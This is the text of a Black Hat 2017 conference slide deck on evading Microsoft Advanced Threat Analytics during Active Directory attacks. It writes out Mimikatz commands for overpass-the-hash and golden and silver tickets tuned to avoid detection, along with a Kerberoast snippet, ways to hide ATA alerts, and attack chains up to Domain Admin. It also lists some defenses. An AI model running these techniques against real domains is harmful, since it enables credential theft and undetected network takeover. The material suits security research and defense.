Evading Microsoft ATA for Active Directory Domination

Nikhil Mittal
Evading Microsoft ATA for
Active Directory Domination
Nikhil Mittal
About me
• Hacker, Red Teamer, Trainer, Speaker at
http://pentesteracademy.com/
• Twitter - @nikhil_mitt
• Blog – http://labofapenetrationtester.com
• Github - https://github.com/samratashok/
• Creator of Kautilya and Nishang
• Interested in Offensive Information Security, new attack
vectors and methodologies to pwn systems.
• Previous Talks and/or Trainings
– DefCon, BlackHat, CanSecWest, BruCON, DeepSec and more.
Evading ATA by Nikhil Mittal 2BlackHat USA 2017
Contents
• Introduction
• Architecture
• Lab Configuration
• Detections
• Evasion and Bypass
• Complete attack path/kill chain from normal
domain user to DA
• Conclusion
BlackHat USA 2017 3Evading ATA by Nikhil Mittal
What is Microsoft ATA?
• “Advanced Threat Analytics (ATA) is an on-
premises platform that helps protect your
enterprise from multiple types of advanced
targeted cyber attacks and insider threats.”
https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-
explore/what-is-ata
• ATA detects attacks by reading certain
“interesting” protocols’ traffic to the domain
controller(s), SIEM events and logs.
• Anomaly based and behavior based detection.
BlackHat USA 2017 4Evading ATA by Nikhil Mittal
ATA Architecture
BlackHat USA 2017 5Evading ATA by Nikhil Mittal
Lab Configuration
• Lab used for experiments contains a Lightweight
ATA gateway installed over a Server 2012 R2
Domain Controller with students and
professionals (400+) trying various Active
Directory attacks from various machines.
• ATA 1.7 and 1.8 with the default configuration
have been installed and used as documented
here.
https://docs.microsoft.com/en-us/advanced-
threat-analytics/deploy-use/install-ata-step1
BlackHat USA 2017 6Evading ATA by Nikhil Mittal
Detections – Threats of interest which
ATA detects
• Recon
– Account Enumeration
– Session Enumeration
– AD Enumeration
• Compromised Credentials
– Brute Force
– Unusual protocol implementation
– Abnormal Behavior
• Lateral Movement
– Pass the ticket
– Pass the hash
– Overpass-the-hash
– Abnormal behavior
• Domain Dominance
– Golden Ticket
– Malicious replication requests
https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-threats
BlackHat USA 2017 7Evading ATA by Nikhil Mittal
Evading ATA - Recon- Detection
• ATA detects AD based recon by looking for
queries sent to the DC.
• But, ATA doesn’t mind DC giving out useful
information unless invasive recon is done
against the DC!
BlackHat USA 2017 Evading ATA by Nikhil Mittal 8
Evading ATA – Recon - Bypass
• Intelligent Recon is not caught by ATA.
• Not poking the DC is the key! Enumerate the
domain but do not enumerate the DC. For
example, while hunting for DA tokens, get a
list of computers and DAs from the DC but do
not run enumeration tools against the DC.
• Same holds true for other user hunting
activities like enumerating local admins,
looking for local admin access etc.
BlackHat USA 2017 Evading ATA by Nikhil Mittal 9
Evading ATA – Recon - Bypass
Hunting for Domain Admin token
• Avoid searching for DA token on the DC. Local
admin privileges are required to use the token.
• To hunt for those machines where a DA token is
available, we can enumerate Domain Admins
from the DC, get a list of machines using ping
sweep or asking from DC and then run Invoke-
UserHunter (PowerView) on all machines except
the DC.
BlackHat USA 2017 Evading ATA by Nikhil Mittal 10
Evading ATA - Recon
• SPN (Service Principal Name) Scanning doesn’t
get detected.
• SPN is used by Kerberos to associate a service
instance with a service logon account.
https://msdn.microsoft.com/en-
us/library/windows/desktop/ms677949%28v%3Dvs.85%29.aspx
• Tools like PowerView can be used for SPN
scanning.
BlackHat USA 2017 11Evading ATA by Nikhil Mittal
Evading ATA – Recon - Demo
BlackHat USA 2017 Evading ATA by Nikhil Mittal 12
Evading ATA – Brute Force
• A Brute force attack which tries single
password for multiple users doesn’t get
detected – which is a well known technique
for brute-forcing AD users.
http://www.labofapenetrationtester.com/2015/04/pi
llage-the-village-powershell-version.html
BlackHat USA 2017 13Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash
• Overpass-The-Hash allows to create Kerberos
tickets from NTLM hashes/AES keys.
• This allows access to resources which need
Kerberos authentication with “just” a hash.
• Explained by Benjamin here:
http://blog.gentilkiwi.com/securite/mimikatz/
overpass-the-hash
BlackHat USA 2017 14Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash -
Detection
• This is what a
normal AS-REQ
packet looks
like. Note the
encryption type
for timestamp.
BlackHat USA 2017 15Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash -
Detection
• This is what an AS-
REQ packet looks
like when using
NTLM hashes for
Over-PTH. Note that
the encryption type
used by timestamp
is downgraded.
Invoke-Mimikatz
–Command
‘”sekurlsa::pth
/user:privservi
ce
/domain:offensi
veps.com
/ntlm:ntlmhash”
’
BlackHat USA 2017 16Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash -
Detection
• ATA looks for anomalies like the one discussed.
• There are two detections for Over-PTH
– One is “Encryption downgrade activity” for which ATA even
conveniently tells the reason for detection.
BlackHat USA 2017 17Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash -
Detection
• There are two detections for Over-PTH
– Second is “Unusual protocol implementation” for which I
_believe_ ATA looks for supported encryption types as well.
If not now, in future?
Normal
NTLM
AES
BlackHat USA 2017 18Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash -
Bypass
• So, to bypass this detection, all we need to do is to make the
encryption type same as the one used normally.
• The following mimikatz command can be used for that:
Invoke-Mimikatz -Command '"sekurlsa::pth
/user:privservice /domain:offensiveps.com
/aes256:aes256 /ntlm:ntlm /aes128:aes128"‘
• I have noted that putting all AES256, AES128 and NTLM(RC4)
together reduces chances of detection.
• “AES keys can be replaced only on 8.1/2012r2 or
7/2008r2/8/2012 with KB2871997, in this case you can avoid
NTLM hash.” -
https://github.com/gentilkiwi/mimikatz/wiki/module-~-
sekurlsaBlackHat USA 2017 19Evading ATA by Nikhil Mittal
BlackHat USA 2017 20Evading ATA by Nikhil Mittal
Evading ATA - Overpass-the-hash –
False events/detections
• Interestingly, the “Unusual protocol implementation”
detection for Overpass-the-hash identifies the user with the
username (/user option) used in created ticket.
• This means, we can create failure events for any user in the
domain (even honey token users of ATA) which could be
useful for generating false detections.
BlackHat USA 2017 21Evading ATA by Nikhil Mittal
Evading ATA - Golden Ticket
• We can now use Over-PTH to create tickets of DA
without detection. The next step is to create a
Golden ticket for domain dominance.
• Since Golden ticket is a valid TGT, the action now
is for the TGS-REQ packet.
• Krbtgt hash is required for creating a Golden
ticket.
• Golden Ticket:
https://www.blackhat.com/docs/us-
14/materials/us-14-Duckwall-Abusing-Microsoft-
Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf
BlackHat USA 2017 22Evading ATA by Nikhil Mittal
Evading ATA - Golden Ticket -
Detection
• This is what
a normal
TGS-REQ
packet looks
like. Note
the
encryption
type used for
the ticket.
BlackHat USA 2017 23Evading ATA by Nikhil Mittal
Evading ATA - Golden Ticket -
Detection
• TGS-REQ
packet for a
Golden Ticket
generated
using NTLM
hash. Note
the
encryption
type has
been
downgraded.
Invoke-Mimikatz -Command '"kerberos::golden /User:privservice
/domain:offensiveps.com /sid:S-1-5-21-3270384115-3177237293-604223748
/krbtgt:ntlmhash /id:500 /groups:513 /ptt"'
BlackHat USA 2017 24Evading ATA by Nikhil Mittal
Evading ATA - Golden Ticket -
Detection
• Once again, ATA looks for anomalies like the
encryption type downgrade.
• The detection for Golden ticket is:
– “Encryption downgrade activity” for which ATA informs us
that the “encryption method of the TGT field of TGS_REQ
message has been downgraded”.
BlackHat USA 2017 25Evading ATA by Nikhil Mittal
Evading ATA - Golden Ticket - Bypass
• Once again, to bypass this detection, all we need to do is to
make the encryption type same as the one used normally :)
• The following mimikatz command can be used for that:
Invoke-Mimikatz -Command '"kerberos::golden
/User:privservice /domain:offensiveps.com /sid:S-
1-5-21-3270384115-3177237293-604223748
/aes256:aes256keysofkrbtgt /id:500 /groups:513
/ptt"‘
• A Golden ticket using AES keys can be generated from any
machine unlike restrictions in case of Over-PTH.
BlackHat USA 2017 26Evading ATA by Nikhil Mittal
BlackHat USA 2017 27Evading ATA by Nikhil Mittal
Evading ATA - Golden Ticket - Bypass
• Also, to my surprise, creating a Golden ticket for a non-
existent username doesn’t get detected even with NTLM
hash!! – No need of running DCSync for AES keys!
• The following mimikatz command can be used for that:
Invoke-Mimikatz -Command '"kerberos::golden
/User:nonexistent /domain:offensiveps.com /sid:S-
1-5-21-3270384115-3177237293-604223748
/ntlm:ntlmhashofkrbtgt /id:500 /groups:513 /ptt"‘
• May be because ATA has no such identity
in its database, it can’t detect the action.
• I hope this is a mis-configuration in my
labs. No it is not a mis-config :/
BlackHat USA 2017 28Evading ATA by Nikhil Mittal
Evading ATA 1.8 - Golden Ticket -
Bypass
• ATA 1.8 introduces ticket lifetime based detection for
Golden tickets. “If a Kerberos ticket is used for more
than the allowed lifetime, ATA will detect it as a
suspicious activity”.
• While this definitely blunts the attack there are still
couple of ways around it.
• First, Keep the krbtgt hash handy and create a
Golden ticket whenever required –easy and simple.
Keep in mind that it is the krbtgt hash which
provides persistence, not the Golden ticket.
BlackHat USA 2017 29Evading ATA by Nikhil Mittal
Evading ATA 1.8 - Golden Ticket -
Bypass
• Second, while creating a Golden ticket keep in mind
the lifetime of the ticket. Create a ticket which is
valid from a future date with ticket lifetime within
domain settings (default is 10 hours).
• The below ticket is valid for one hour after two hours
from the time of creation:
Invoke-Mimikatz -Command '"kerberos::golden
/User:privservice /domain:offensiveps.com /sid:S-
1-5-21-3270384115-3177237293-604223748 /aes256:
/id:500 /groups:513 /startoffset:120 /endin:60
/renewmax:100800 /ticket:golden.kirbi"‘
• Make sure you purge the tickets from memory once
the activity is over.BlackHat USA 2017 30Evading ATA by Nikhil Mittal
Evading ATA – Constrained Delegation
• Constrained delegation attack – the ability to
access a service by impersonating *any* user
if the service account is configured for it-
doesn’t get detected even if services on the
DC are accessed.
• More about the attack:
https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/
http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more
BlackHat USA 2017 31Evading ATA by Nikhil Mittal
Evading ATA – Constrained Delegation
• When the initial request is sent to request a
TGT (AS-REQ), this is how it looks like (service
accounts support only RC4 encryption)
.asktgt.exe /user:ops-mssql$ /domain:offensiveps.com
/key:ntlmhash /ticket:opsmssql.kirbi
BlackHat USA 2017 32Evading ATA by Nikhil Mittal
Evading ATA – Constrained Delegation
• In the subsequent exchanges (for requesting TGS and
accessing the service) the encryption type is normal so no
detection here as well.
• Even a code execution by accessing HOST and RPCSS for WMI
doesn’t get detected.
• I believe ATA cannot detect this attack because it, right now,
lacks the ability or signature for the attack.
• Please note that if actions like DCSync are used by accessing
ldap service using this attack, there would be a detection in
ATA for “Malicious replication of directory services”.
BlackHat USA 2017 33Evading ATA by Nikhil Mittal
Evading ATA – Attacks across trusts
• Most attacks across trusts are not
detected.
• While there are so many scenarios, I
checked couple of more interesting ones:
– Escalate from child domain admin to forest
enterprise admin.
– DCSync/Replication using inter-realm TGT and
executed from the child DC doesn’t get detected.
https://adsecurity.org/?p=1588
BlackHat USA 2017 34Evading ATA by Nikhil Mittal
Evading ATA – Attacks across trusts
Escalation from child to forest root
• A valid TGT is created using NTLM/RC4 hash
of krbtgt for the child domain (along with
some other information).
• The encryption type for both the child and
parent domain from the source machine is
by-default ARCFOUR-HMAC-MD5 so chances
of detection are low :)
• ATA does detect Overpass-the-hash (AS-REQ)
with downgraded encryption type.
BlackHat USA 2017 35Evading ATA by Nikhil Mittal
Evading ATA – Attacks across trusts
DCSync/Replication doesn’t get detected.
• A replication done across trust – from
child to root – when done from child DC,
doesn’t get detected which makes sense
as DCs requesting replication is normal.
• This just makes the escalation to EA of
forest from a child DA much sweeter ;)
BlackHat USA 2017 36Evading ATA by Nikhil Mittal
Evading ATA – Plaintext passwords
• Using passwords avoid many anomaly based
attacks. Depending on the target OS, palintext
passwords can be found in :
– Wdigest
– LSA Secrets
– Log on passwords
– Unattended deployment files
– File servers
BlackHat USA 2017 37Evading ATA by Nikhil Mittal
Avoiding ATA
• If you can’t bypass it, avoid it :)
• There are attacks which can be used to
avoid ATA by having no or minimal
conversation with the DC.
• Such attacks may not cover the complete
attack chain but will still come handy in
an actual assessment.
BlackHat USA 2017 38Evading ATA by Nikhil Mittal
Avoiding ATA – Silver Ticket
• Silver ticket attacks cannot be detected by ATA as
there is no communication with the DC (it is a
valid TGS).
Invoke-Mimikatz -Command '"kerberos::golden
/User:sqladmin /domain:offensiveps.com
/sid:S-1-5-21-3270384115-3177237293-604223748
/target:ops-mssql.offensiveps.com
/service:MSSQLSvc /rc4:b /id:500 /ptt"‘
• More about Silver Tickets:
https://digital-forensics.sans.org/blog/2014/11/24/kerberos-
in-the-crosshairs-golden-tickets-silver-tickets-mitm-more
BlackHat USA 2017 39Evading ATA by Nikhil Mittal
Avoiding ATA – Silver Ticket
BlackHat USA 2017 40Evading ATA by Nikhil Mittal
Avoiding ATA – Kerberoast
• Kerberoast attack is not detected by ATA as there is
minimal and normal communication with the DC.
• Just need to request a TGS (TGS-REQ and TGS-REP)
Add-Type -AssemblyNAme System.IdentityModel
New-Object
System.IdentityModel.Tokens.KerberosRequestorSecur
ityToken -ArgumentList “MSSQLSvc/OPS-
file.offensiveps.com:SQLEXPRESS
• Kerberoast:
https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Do
g%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-
%20Tim%20Medin(1).pdf
BlackHat USA 2017 41Evading ATA by Nikhil Mittal
Avoiding ATA – Kerberoast
BlackHat USA 2017 42Evading ATA by Nikhil Mittal
Avoiding ATA – Kerberoast variants
• Variants of Kerberoast are also not detected
for the same reason – normal interaction
with DC.
– Request AS-REP from DC for the accounts which do
not require Pre-Auth and brute-force it offline.
– With enough privileges, force-set SPN for a user,
request a TGS for the SPN and brute-force it offline.
– With enough privileges, force disable Pre-Auth for a
user.
http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-
weaponizing-kerberos-protocol-flaws
http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
BlackHat USA 2017 43Evading ATA by Nikhil Mittal
Avoiding ATA – SQL Server
• Targeting SQL servers allows avoiding
interaction with DC and thus, ATA.
– Brute-Force SQL server logins.
– Use linked DBs to move.
– Never leave the Database layer. It may also be one
of the places where we can achieve goal of an
assessment (access to IP, PII, Employee data etc.)
BlackHat USA 2017 44Evading ATA by Nikhil Mittal
BlackHat USA 2017 Evading ATA by Nikhil Mittal 45
Avoiding ATA – Attack Chain 1
• Started as a normal domain user – DA is the goal
– SPN Scanning for SQL Servers.
– Gain access to a SQL Server
• Look for database connection strings;
• Exploit SQL injection;
• Brute force a SQL server with sa or other SQL Server login
– Move around in the database layer using linked databases.
– Identify a SQL server service running with DA
– Achieve command execution on the SQL server with DA
privileges (if DA privilege was the goal)
http://www.labofapenetrationtester.com/2017/03/using-
sql-server-for-attacking-forest-trust.html
BlackHat USA 2017 46Evading ATA by Nikhil Mittal
Avoiding ATA – Attack Chain 2
• Started as a normal domain user – DA is the goal
– Enumerate accounts (users and machines) with
constrained delegation enabled.
– Looks for access to service running under a machine
account.
– Access services like HOST and RPCSS etc. to achieve
command execution on DC.
– Further lateral movement using Overpass-the-hash
with AES keys and/or pull krbtgt hash and target the
forest root.
BlackHat USA 2017 47Evading ATA by Nikhil Mittal
ATA - Limitations
• Encrypted traffic (like LDAPS and IPSEC ESP) is
not analyzed but may not affect detection
https://github.com/MicrosoftDocs/ATADocs/blob/
master/ATADocs/ata-technical-faq.md#does-ata-
work-with-encrypted-traffic
• Communication outside protocols monitored
by ATA
https://docs.microsoft.com/en-us/advanced-
threat-analytics/ata-prerequisites
BlackHat USA 2017 48Evading ATA by Nikhil Mittal
ATA - Limitations
• Must have signatures for attack types.
– We saw example of Constrained Delegation.
– Another very interesting attack which ATA can’t detect
because it does not know the attack is loading an
arbitrary dll using DNS service – elevation to DA from
DNSAdmins membership if DC is also the DNS server.
https://medium.com/@esnesenon/feature-not-bug-
dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
http://www.labofapenetrationtester.com/2017/05/abusing
-dnsadmins-privilege-for-escalation-in-active-
directory.html
BlackHat USA 2017 49Evading ATA by Nikhil Mittal
Attacking ATA deployment
• ATA Console can be identified with basic banner
grabbing.
• ATA, interestingly, seems to subscribe to the
concept of “if its admin its game over”. All
users/groups added to the local administrators
group of ATA Centre have admin access to the
console by default!
https://blogs.technet.microsoft.com/enterprisemobility/2016
/06/10/best-practices-for-securing-advanced-threat-
analytics/
BlackHat USA 2017 50Evading ATA by Nikhil Mittal
Attacking ATA deployment
• The backend MongoDB
listens only on localhost but
needs no authentication :)
• With administrative access
on the ATA Center, the
backend MongoDB can be
accessed.
• Interesting collections like
Unique identities for users
and machines, Suspicious
activities, Kerberos traffic
and many more.
BlackHat USA 2017 51Evading ATA by Nikhil Mittal
Attacking ATA deployment
• It is possible to tamper with alerts using access to
this database. No alerts are generated if the
database is tampered.
BlackHat USA 2017 52Evading ATA by Nikhil Mittal
Attacking ATA deployment
• It is also possible (and easier) to set the
visibility of alerts to false by setting the
“IsVisible” property of any entry in the
SuspiciousActivity collection in the ATA
database.
BlackHat USA 2017 53Evading ATA by Nikhil Mittal
Defenses against the Evasions
• ATA even if can’t detect anomalies, provides
interesting insight in the traffic exchanged with
the Domain Controller. Use that to detect the
attackers.
• Limit your DAs to login only to Domain
Controllers. Remember prevention is better than
cure.
• Implement possible architectural changes
suggested here:
https://technet.microsoft.com/en-us/windows-
server-docs/security/securing-privileged-
access/securing-privileged-access
BlackHat USA 2017 54Evading ATA by Nikhil Mittal
Evading ATA - Forever
• Avoid the temptation of escalating to Domain
Admin privileges without understanding the
active directory environment and possible
defenses in place.
• Reduce communication to the DC. Go slow and
careful in the lateral movement phase. Don’t
create a Golden Ticket or launch a Skeleton Key
just to brag about it in your report.
• Stay focused on the goal of the assessment. If you
can’t bypass it, avoid it!
BlackHat USA 2017 55Evading ATA by Nikhil Mittal
Limitations
• Focus of all the bypasses is on Anomaly based
detections.
• Many behavior based detections could not be
replicated in the lab and are more powerful
and useful in a real environment.
• Behavior based detection may detect lateral
movement even if the anomaly based
detection is bypassed – use the avoidance
techniques in such cases.
BlackHat USA 2017 Evading ATA by Nikhil Mittal 56
The ATA Team
• Thanks to the ATA Team. You guys are
awesome! It was a pleasure working with you.
BlackHat USA 2017 Evading ATA by Nikhil Mittal 57
Black Hat Sound Bytes
• It is possible to bypass detections by ATA by
modifying well known attacks so that they
appear normal.
• Modification of attack methodologies and
avoiding talking to DC is also effective.
• Despite its limitations, ATA provides effective
visibility and detection for AD attacks.
BlackHat USA 2017 58Evading ATA by Nikhil Mittal
Thank you
• Please leave feedback.
• Follow me @nikhil_mitt
• For questions, training, assessments -
nikhil.uitrgpv@gmail.com
nikhil@pentesteracademy.com
• Slides and blog posts on ATA will be posted on my
blog and Github
http://labofapenetrationtester.com/
https://github.com/samratashok
BlackHat USA 2017 Evading ATA by Nikhil Mittal 59
1 of 59

Recommended

Red Team Revenge - Attacking Microsoft ATA by
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
2.5K views41 slides
PowerShell for Practical Purple Teaming by
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
5.3K views46 slides
Hacking the future with USB HID by
Hacking the future with USB HIDHacking the future with USB HID
Hacking the future with USB HIDNikhil Mittal
4.2K views34 slides
0wn-premises: Bypassing Microsoft Defender for Identity by
0wn-premises: Bypassing Microsoft Defender for Identity0wn-premises: Bypassing Microsoft Defender for Identity
0wn-premises: Bypassing Microsoft Defender for IdentityNikhil Mittal
1.6K views26 slides
Hunting Lateral Movement in Windows Infrastructure by
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
9.1K views52 slides
aclpwn - Active Directory ACL exploitation with BloodHound by
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
11.5K views41 slides

More Related Content

What's hot

DerbyCon 2019 - Kerberoasting Revisited by
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
10.4K views27 slides
ReCertifying Active Directory by
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
1.8K views37 slides
Six Degrees of Domain Admin - BloodHound at DEF CON 24 by
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
17.1K views32 slides
Mitre Attack - Credential Dumping - updated.pptx by
Mitre Attack - Credential Dumping - updated.pptxMitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptxwaizuq
144 views18 slides
Derbycon - The Unintended Risks of Trusting Active Directory by
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
35.9K views51 slides
Red Team Methodology - A Naked Look by
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
14.7K views62 slides

What's hot(20)

DerbyCon 2019 - Kerberoasting Revisited by Will Schroeder
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder10.4K views
ReCertifying Active Directory by Will Schroeder
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder1.8K views
Six Degrees of Domain Admin - BloodHound at DEF CON 24 by Andy Robbins
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins17.1K views
Mitre Attack - Credential Dumping - updated.pptx by waizuq
Mitre Attack - Credential Dumping - updated.pptxMitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptx
waizuq144 views
Derbycon - The Unintended Risks of Trusting Active Directory by Will Schroeder
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder35.9K views
Red Team Methodology - A Naked Look by Jason Lang
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang14.7K views
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors by Will Schroeder
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder7K views
Hunting for Privilege Escalation in Windows Environment by Teymur Kheirkhabarov
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Pwning the Enterprise With PowerShell by Beau Bullock
Pwning the Enterprise With PowerShellPwning the Enterprise With PowerShell
Pwning the Enterprise With PowerShell
Beau Bullock6.4K views
The Unintended Risks of Trusting Active Directory by Will Schroeder
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder8.5K views
Fundamentals of Linux Privilege Escalation by nullthreat
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
nullthreat13.2K views
Troopers 19 - I am AD FS and So Can You by Douglas Bienstock
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
Douglas Bienstock8.2K views
Windows Privilege Escalation by Riyaz Walikar
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege Escalation
Riyaz Walikar15.2K views
Hot potato Privilege Escalation by Sunny Neo
Hot potato Privilege EscalationHot potato Privilege Escalation
Hot potato Privilege Escalation
Sunny Neo2.2K views
Fantastic Red Team Attacks and How to Find Them by Ross Wolf
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf898 views
Hunting malware with volatility v2.0 by Frank Boldewin
Hunting malware with volatility v2.0Hunting malware with volatility v2.0
Hunting malware with volatility v2.0
Frank Boldewin1.7K views
Attacker's Perspective of Active Directory by Sunny Neo
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
Sunny Neo1.6K views

Similar to Evading Microsoft ATA for Active Directory Domination

In the Wake of Kerberoast by
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoastken_kitahara
830 views35 slides
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access by
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Accesseightbit
279 views41 slides
Hacktive Directory Forensics - HackCon18, Oslo by
Hacktive Directory Forensics - HackCon18, OsloHacktive Directory Forensics - HackCon18, Oslo
Hacktive Directory Forensics - HackCon18, OsloYossi Sassi
179 views53 slides
Shytikov on NTLM Authentication by
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authenticationshytikov
1.6K views13 slides
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015 by
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015CSO_Presentations
743 views137 slides
Symmetric Crypto for DPDK - Declan Doherty by
Symmetric Crypto for DPDK - Declan DohertySymmetric Crypto for DPDK - Declan Doherty
Symmetric Crypto for DPDK - Declan Dohertyharryvanhaaren
2K views20 slides

Similar to Evading Microsoft ATA for Active Directory Domination(20)

In the Wake of Kerberoast by ken_kitahara
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoast
ken_kitahara830 views
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access by eightbit
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
eightbit279 views
Hacktive Directory Forensics - HackCon18, Oslo by Yossi Sassi
Hacktive Directory Forensics - HackCon18, OsloHacktive Directory Forensics - HackCon18, Oslo
Hacktive Directory Forensics - HackCon18, Oslo
Yossi Sassi179 views
Shytikov on NTLM Authentication by shytikov
Shytikov on NTLM AuthenticationShytikov on NTLM Authentication
Shytikov on NTLM Authentication
shytikov1.6K views
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015 by CSO_Presentations
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
CSO_Presentations743 views
Symmetric Crypto for DPDK - Declan Doherty by harryvanhaaren
Symmetric Crypto for DPDK - Declan DohertySymmetric Crypto for DPDK - Declan Doherty
Symmetric Crypto for DPDK - Declan Doherty
harryvanhaaren2K views
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2 by Chris Gates
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates7.6K views
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense by Felipe Prado
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
Felipe Prado84 views
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS by Cody Thomas
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSWalking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Cody Thomas1.3K views
What I learned about IoT Security ... and why it's so hard! by Christoph Engelbert
What I learned about IoT Security ... and why it's so hard!What I learned about IoT Security ... and why it's so hard!
What I learned about IoT Security ... and why it's so hard!
SpecterOps Webinar Week - Kerberoasting Revisisted by Will Schroeder
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
Will Schroeder3.7K views
How to Secure Your Scylla Deployment: Authorization, Encryption, LDAP Authent... by ScyllaDB
How to Secure Your Scylla Deployment: Authorization, Encryption, LDAP Authent...How to Secure Your Scylla Deployment: Authorization, Encryption, LDAP Authent...
How to Secure Your Scylla Deployment: Authorization, Encryption, LDAP Authent...
ScyllaDB1.8K views
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-... by BlueHat Security Conference
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
Purpose Driven Hunt (DerbyCon 2017) by Jared Atkinson
Purpose Driven Hunt (DerbyCon 2017)Purpose Driven Hunt (DerbyCon 2017)
Purpose Driven Hunt (DerbyCon 2017)
Jared Atkinson2.6K views
